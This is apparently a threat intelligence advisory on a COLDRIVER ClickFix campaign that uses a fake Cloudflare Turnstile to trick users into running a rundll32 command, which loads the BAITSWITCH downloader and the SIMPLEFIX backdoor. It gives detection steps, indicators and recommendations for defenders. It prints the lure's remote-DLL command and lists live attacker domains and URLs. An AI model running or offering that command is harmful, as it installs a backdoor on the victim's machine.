ClickFix COLDRIVER’s Fake Turnstile Lure Delivers BAITSWITCH and SIMPLEFIX
October 8th, 2025
High
Our Cyber Threat Intelligence Unit is monitoring an ongoing ClickFix social engineering campaign, which is linked to the Russia-associated APT COLDRIVER (also known as Star Blizzard / Callisto / UNC4057). In September 2025, researchers identified a multi-stage infection process that exploits a fake Cloudflare Turnstile UI to deceive users into pasting a malicious command from their clipboard. Running this command loads a malicious DLL, Machinerie.dll, which Zscaler calls BAITSWITCH. This DLL downloads and runs a PowerShell backdoor named SIMPLEFIX. Adversaries employ environmental filtering to deliver payloads only to selected targets, focusing on civil society organizations, journalists, think tanks, and advocacy groups, particularly those involved in human rights, and democracy.
Technical Details
Attack Type: Social engineering (ClickFix), remote code execution via rundll32.exe, multi-stage downloader + PowerShell backdoor.
Severity: High
Delivery Method: Victims visit a lure page mimicking a legitimate resource. The site displays a fake Cloudflare Turnstile, whose JavaScript copies a rundll32.exe \\<UNC>\machinerie.dll,verifyme command to the clipboard and prompts the user to paste it into the Windows Run dialog.
Execution Chain:
rundll32.exe executes Machinerie.dll (BAITSWITCH) → performs environment and user-agent checks.
DLL fetches tasking from captchanom[.]top and related C2 domains, returning 404 for non-matching agents.
Receives AES-encoded payload blobs and registry-based persistence commands.
BAITSWITCH writes an AES-encrypted PowerShell script to the registry and drops %APPDATA%\Microsoft\Windows\FvFLcsr23.ps1.
Configures persistence via UserInitMprLogonScript registry value → PowerShell stager runs on login.
PowerShell stager decrypts and launches the SIMPLEFIX backdoor, enabling command execution and C2 communications.
Impact
Systems executing the clipboard command receive a downloader that establishes registry-based persistence and installs a PowerShell backdoor.
Compromised hosts may allow credential theft, data exfiltration, or serve as footholds for follow-on operations.
Use of rundll32.exe + registry-stored payloads reduces disk forensic traces, delaying detection.
Campaign relies on selective payload delivery and legitimate hosting (e.g., Google Drive decoys), undermining static URL blocklists.
Detection Method
Monitor Run-dialog and clipboard activity: alert on rundll32.exe \\<UNC>\… patterns or pastes from untrusted sites.
Detect rundll32.exe loading DLLs from remote UNC paths or exports such as verifyme.
Watch for registry changes to HKCU\Environment\UserInitMprLogonScript and creation of %APPDATA%\Microsoft\Windows\*.ps1.
Inspect outbound HTTP(S) to known C2s: captchanom[.]top, southprovesolutions[.]com, preentootmist[.]org, blintepeeste[.]org.
Enable PowerShell ScriptBlock + AMSI logging to capture in-memory decryption of AES blobs and registry artifacts (EnthusiastMode, QatItems).
Indicators of Compromise
Type | Indicator | Description |
UNC path / command |
rundll32.exe \\captchanom[.]top\check\machinerie.dll,verifyme
| Clipboard command used by lure; initial execution vector. |
DLL Component | Machinerie.dll (BAITSWITCH) FvFLcsr23.ps1 | Downloader DLL executed via rundll32.exe |
Domain | captchanom[.]top , southprovesolutions[.]com preentootmist[.]org blintepeeste[.]org | Primary C2 domain serving commands and payloads. |
File |
%APPDATA%\Microsoft\Windows\FvFLcsr23.ps1 | PowerShell stager drop path used for persistence. |
URL | hxxps://preentootmist[.]org/?uinfo_message=Resilient_Voices hxxps://blintepeeste[.]org/?u_storages=Resilient_Voices_concept hxxps://captchanom[.]top/check/machinerie.dll hxxps://captchanom[.]top/coup/premier hxxps://captchanom[.]top/coup/deuxieme hxxps://captchanom[.]top/coup/troisieme hxxps://captchanom[.]top/coup/quatre hxxps://southprovesolutions[.]com/FvFLcsr23 hxxps://southprovesolutions[.]com/Zxdf hxxps://southprovesolutions[.]com/KZouoRc hxxps://southprovesolutions[.]com/EPAWl hxxps://southprovesolutions[.]com/VUkXugsYgu | URLs related to clickfix Phishing page, BAITSWITCH DLL host |
HASH | FvFLcsr23.ps1 — 62ab5a28801d2d7d607e591b7b2a1e9ae0bfc83f9ceda8a998e5e397b58623a0 | Malicious file hash |
Email Account |
narnobudaeva@gmail[.]com | Attacker-controlled Google Drive account used to host decoy documents. |
Recommendations
Block / monitor C2 domains (captchanom[.]top, southprovesolutions[.]com, etc.) at firewall and DNS layers.
Hunt for rundll32 \\UNC command patterns in endpoint telemetry; quarantine affected hosts.
Enable PowerShell ScriptBlock, Module, and AMSI logging; centralize for correlation.
Monitor registry writes to UserInitMprLogonScript and new PowerShell scripts in %APPDATA%.
Educate users about ClickFix threats and reinforce that no legitimate site will request pasting clipboard commands into Run dialogs.
If BAITSWITCH / SIMPLEFIX activity is found, isolate the host, collect memory + registry evidence, then remove persistence after forensic capture and rotate credentials.
Conclusion
The COLDRIVER ClickFix campaign demonstrates how simple GUI tricks can still yield high-confidence execution in targeted environments. By abusing the clipboard → Run workflow and legitimate Windows binaries, threat actors bypass traditional email filters and leave minimal disk artifacts. We urge organizations to combine user education with technical controls, such as clipboard/run-dialog monitoring, PowerShell logging, strict UNC execution policies, and network blocking of the listed C2 domains to maintain a proactive security posture. Additionally, we recommend actively threat-hunting for the registry and file artifacts mentioned in the Indicators of Compromise section above.